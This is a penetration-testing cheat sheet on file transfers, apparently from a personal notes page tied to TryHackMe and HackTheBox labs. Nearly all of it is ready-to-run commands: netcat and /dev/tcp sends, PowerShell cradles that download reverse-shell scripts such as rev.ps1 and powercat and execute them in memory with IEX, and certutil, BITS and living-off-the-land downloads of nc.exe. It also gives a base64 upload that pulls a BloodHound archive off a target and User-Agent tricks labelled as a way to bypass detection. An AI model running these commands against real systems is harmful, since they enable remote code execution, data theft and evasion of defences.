TryhackmeHackthebox

File Transfers

01. Linux

  • Simple file transfer (My way)

## ------------------| NetCat
### Receiving side
nc -lp 1234 > out.file
### Sending side
nc -w 3 <ReceiverIP> 1234 < out.file
cat out.file > /dev/tcp/<DestinationIP>/1234

# ------------------| Socat
### Sending side
socat TCP4-LISTEN:1234,fork file:secret.txt
### Receiving side
socat TCP4:<SenderIP>:1234 file:secret.txt,create

  • Download Files.

## ------------------| AXEL
axel -a -n 10 -k -o /tmp/secret.txt https://<IP>/secret.txt
## -a    Alternate progress indicator
## -n    Specify maximum number of connections
## -k    Don't verify the SSL certificate

## ------------------| WGET
wget https://<IP>/secret.txt -O /tmp/secret.txt

## ------------------| CURL
curl https://<IP>/secret.txt -o /tmp/secret.txt 

## ------------------| OpenSSL
### Create certificate
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem     
### Stand up server
openssl s_server -quiet -accept 80 -cert certificate.pem -key key.pem < /tmp/secret.txt
### Download file
openssl s_client -connect <IP>:80 -quiet > secret.txt

## ------------------| Bash (/dev/tcp)
### Connect to Target's Webserver
exec 3<>/dev/tcp/10.10.10.32/80
### HTTP GET Request
echo -e "GET /secret.txt HTTP/1.1\n\n">&3
### Print the Response
cat <&3

## ------------------| PHP
### File_get_contents()
php -r '$file = file_get_contents("https://<IP>/secret.txt"); file_put_contents("secret.txt",$file);'       
### Fopen()
php -r 'const BUFFER = 1024; $fremote = fopen("https://<IP>/secret.txt", "rb"); $flocal = fopen("secret.txt", "wb"); while ($buffer = fread($fremote, BUFFER)) { fwrite($flocal, $buffer); } fclose($flocal); fclose($fremote);'      

## ------------------| Python
### Python2
import urllib
urllib.urlretrieve ("https://<IP>/secret.txt", "secret.txt")
### Python3
import urllib.request
urllib.request.urlretrieve("https://<IP>/secret.txt", "secret.txt")

## ------------------| Ruby
ruby -e 'require "net/http"; File.write("secret.txt", Net::HTTP.get(URI.parse("https://<IP>/secret.txt")))'

## ------------------| Perl
perl -e 'use LWP::Simple; getstore("https://<IP>/secret.txt", "secret.txt");'

02. Windows

## ------------------| Download & Execute
cp /usr/share/windows-resources/powercat/powercat.ps1 .
powershell -c "IEX (New-Object System.Net.Webclient).DownloadString('http://<IP>/powercat.ps1')"

## ------------------| Sender 
powercat -c <IP> -p 1212 -i C:\Users\secret.txt

## ------------------| Receiver
nc -lnvp 1212 > secret.txt

  • Download files.

## ------------------| Old version (support for any version)
powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://<IP>/nc.exe', 'C:\Users\Public\nc.exe')" 

## ------------------| New version (alias IWR)
powershell -c "Invoke-WebRequest http://<IP>/nc.exe -OutFile C:\Users\Public\nc.exe"

## ------------------| Executed in memory (alias IEX)
powershell -c "Invoke-Expression (New-Object Net.WebClient).DownloadString('http://10.10.14.25/rev.ps1')"
powershell -c "Invoke-WebRequest http://10.10.14.25/rev.ps1 | iex"

## ------------------| Internet Explorer’s First Run error (-useBasicParsing)
powershell -c "IWR -useBasicParsing http://<IP>/nc.exe -o C:\Users\Public\nc.exe"
### If you have admin access you can disable Internet Explorer’s First Run customization
reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\Main" /f /v DisableFirstRunCustomize /t REG_DWORD /d 2

## ------------------| CMD ways
certutil -urlcache -split -f "http://<IP>/nc.exe" C:\Users\Public\nc.exe

## ------------------| Using Curl
powershell curl http://<IP>/rev.ps1

## ------------------| The Background Intelligent Transfer Service (BITS)
bitsadmin /transfer n http://<IP>/nc.exe C:\Temp\nc.exe
Import-Module bitstransfer;Start-BitsTransfer -Source "http://<IP>/nc.exe" -Destination "C:\Temp\nc.exe"

  • Upload Files.

$b64 = [System.convert]::ToBase64String((Get-Content -Path 'C:/<PATH>/BloodHound.zip' -Encoding Byte))     
Invoke-WebRequest -Uri http://<IP>:443 -Method POST -Body $b64
## Download file with netcat
echo <base64> | base64 -d -w 0 > bloodhound.zip

## ------------------| The Background Intelligent Transfer Service (BITS)
Start-BitsTransfer "C:\Temp\bloodhound.zip" -Destination "http://<IP>/uploads/bloodhound.zip" -TransferType Upload -ProxyUsage Override -ProxyList PROXY01:8080 -ProxyCredential INLANEFREIGHT\svc-sql    

## ------------------| HTTP POST
### Creare following up.php code in host machine
<?php 
$up_dir = '/var/www/html/';
$up_file = $up_dir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['name'], $up_file);
?>
### Change file permision
sudo chown www-data: /var/www/html
### Upload file through powershell
powershell (New-Object Net.WebClient).UploadFile('http://<IP>/up.php', 'nc.exe')

  • wget Scripts

## ------------------| Create wget.js file
var WinHttpReq = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
WinHttpReq.Open("GET", WScript.Arguments(0), /*async=*/false);
WinHttpReq.Send();
BinStream = new ActiveXObject("ADODB.Stream");
BinStream.Type = 1;
BinStream.Open();
BinStream.Write(WinHttpReq.ResponseBody);
BinStream.SaveToFile(WScript.Arguments(1));

## ------------------| It can be executed as follows.
cscript /nologo wget.js http://<IP>/nc.exe nc.exe

## ------------------| Create wget.vbs file
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", WScript.Arguments.Item(0), False
xHttp.Send

with bStrm
    .type = 1
    .open
    .write xHttp.responseBody
    .savetofile WScript.Arguments.Item(1), 2
end with

## ------------------| It can be executed as follows.
cscript /nologo wget.vbs http://<IP>/nc.exe nc.exe

  • Diffrent User-Agent (For bypass any detections)

## ------------------| WinHttp (Netscape 4.0)
$h=new-object -com WinHttp.WinHttpRequest.5.1;
$h.open('GET','http://<IP>/nc.exe',$false);
$h.send();
iex $h.ResponseText

## ------------------| Msxml2 (Internet Explorer 7.0)
$h=New-Object -ComObject Msxml2.XMLHTTP;
$h.open('GET','http://<IP>/nc.exe',$false);
$h.send();
iex $h.responseText

## ------------------| Certutil
certutil -urlcache -split -f http://<IP>/nc.exe 
certutil -verifyctl -split -f http://<IP>/nc.exe

## ------------------| BITS
Import-Module bitstransfer;
Start-BitsTransfer 'http://<IP>/nc.exe' $env:temp\t;
$r=gc $env:temp\t;
rm $env:temp\t; 
iex $r

## ------------------| Invoke-WebRequest with User-Agent
### List all avilable user agents
[Microsoft.PowerShell.Commands.PSUserAgent].GetProperties() | Select-Object Name,@{label="User Agent";Expression={[Microsoft.PowerShell.Commands.PSUserAgent]::$($_.Name)}} | fl      
### Download file using a Chrome User Agent
Invoke-WebRequest http://<IP>/nc.exe -UserAgent [Microsoft.PowerShell.Commands.PSUserAgent]::Chrome -OutFile "C:\Users\Public\nc.exe"
upx -9 nc.exe
exe2hex -x nc.exe

03. Simple Servers

  • Web servers

## ------------------| Python
python2 -m SimpleHTTPServer 8080
python3 -m http.server 8080

## ------------------| Ruby
ruby -run -e httpd . -p 8080

## ------------------| PHP
php -S 0.0.0.0:8080

## ------------------| Socat
socat TCP-LISTEN:8080,reuseaddr,fork

## ------------------| BusyBox
busybox httpd -f -p 10000

  • FTP server

python3 -m pyftpdlib --user=pentester --password=p4ssw0rd -wTFTP

  • TFTP server (Require Administrative Access)

## ------------------| Windows Enable TFTP
DISM /online /Enable-Feature /FeatureName:TFTP
Install-WindowsFeature TFTP-Client

## ------------------| Linux
sudo apt-get install -y atftp
mkdir /tmp/tftp
sudo chown nobody: /tmp/tftp
sudo atftpd --daemon --port 40 /tmp/tftp

## ------------------| Upload file (on windows machine)
tftp -i <IP> put nc.exe

  • SMB server

## ------------------| Basic usage
impacket-smbserver <shareName> <sharePath>
impacket-smbserver share $(pwd) -smb2support

## ------------------| Start smb server (With auth)
### Start smb server
impacket-smbserver share $(pwd) -smb2support -username h4rithd -password Password123       

## ------------------| Mount without auth
net use Z: \\<MyIP>\share /USER:h4rithd Password123
New-PSDrive -Name h4rithd -PSProvider FileSystem -Root \\<MyIP>\share

## ------------------| Mount with auth
$pass = ConvertTo-SecureString 'Password123' -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential('h4rithd', $pass)
New-PSDrive -Name h4rithd -PSProvider FileSystem -Credential $cred -Root \\<MyIP>\share
cd h4rithd:
dir

  • RDP Server

rdesktop -g 1600x800 -r disk:tmp=/tmp/shares <IP> -u h4rithd -p /dynamic-resolution
xfreerdp /u:h4rithd /p:Password123 /cert:ignore /v:<IP> /workarea /drive:/localdir,share /dynamic-resolution +clipboard

  • Setup nginx server to upload files.

## ------------------| Create server
mkdir -p /tmp/uploads
chmod 777 /tmp/uploads/
sudo chown www-data /tmp/uploads/

sudo vi /etc/nginx/sites-available/file_upload
server {
    listen 8001 default_server;
    server_name up.h4rithd;
    location / {
        root /tmp/uploads;
        dav_methods PUT;
    }
}

sudo ln -s  /etc/nginx/sites-available/file_upload /etc/nginx/sites-enabled/file_upload     
systemctl start nginx

## ------------------| Upload File
curl --upload-file UploadFile.txt IP:8001

04. Living Off The Land Binaries

GfxDownloadWrapper.exe "http://<IP>/nc.exe" "C:\Temp\nc.exe"
lwp-download http://<IP>/nc.exe nc.exe
PreviousToolsNextShells / Payloads

Last updated